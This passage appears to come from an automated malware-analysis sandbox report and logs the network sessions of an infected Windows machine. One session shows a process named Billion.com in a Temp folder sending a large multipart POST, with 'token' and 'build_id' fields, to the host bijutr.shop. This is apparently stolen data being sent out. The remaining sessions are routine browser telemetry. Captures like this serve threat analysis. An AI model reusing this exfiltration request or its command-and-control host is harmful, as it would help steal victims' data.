                                                                                                                                                                                                                                                                                                        Location: /b2?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                        set-cookie: UID=100b66b45e7bac3f3b14d5f1735064915; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                        set-cookie: XID=100b66b45e7bac3f3b14d5f1735064915; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                        Via: 1.1 28ccd2b47efede79124bdab295098b70.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 1H7ZrcqQVVFop8LiVFBTTM2UQxG4KoFjx9aZsoA847oa5pxKP1MIjQ==


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        36192.168.2.650029188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----0RQI5FKFUSJMYU379R90
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 393697
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------0RQI5FKFUSJMYU379R90Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------0RQI5FKFUSJMYU379R90Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------0RQI5FKFUSJMYU379R90Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:37 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        37192.168.2.65004020.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064913988&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 3822
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC3822OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 38 3a 32 38 3a 33 33 2e 39 38 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 34 38 64 30 61 64 2d 39 65 62 30 2d 34 64 66 33 2d 62 63 36 62 2d 35 63 31 32 33 31 64 39 32 33 62 39 22 2c 22 65 70 6f 63 68 22 3a 22 33 36 30 31 37 35 39 37 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-24T18:28:33.983Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=4c8098aae4df49a5a4e63c09634affb1&HASH=4c80&LV=202412&V=4&LU=1735064918265; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=cd3cf7005c3a42a4bb8df4ab45e9d7a0; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 4277
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:38 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        38192.168.2.65004718.238.49.1244437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC1012OUTGET /b2?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: UID=100b66b45e7bac3f3b14d5f1735064915; XID=100b66b45e7bac3f3b14d5f1735064915
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:37 GMT
                                                                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                        Via: 1.1 b15f339834cfb5119481b1c1eb890372.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: pRkdKf8AP0VQLsg_e3xqkigs6iIBze5hsL3AWEL6VtsuQ_qKE03SMg==


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        39192.168.2.65005020.110.205.1194437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC1261OUTGET /c.gif?rnd=1735064913990&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=25e0b3e5ef394e87be94b037e6030b83&activityId=25e0b3e5ef394e87be94b037e6030b83&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B84458BB52864B9C8B94F9F4ABBF5707&MUID=302665E99E416E3C182470B69FCB6F6B HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: c.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
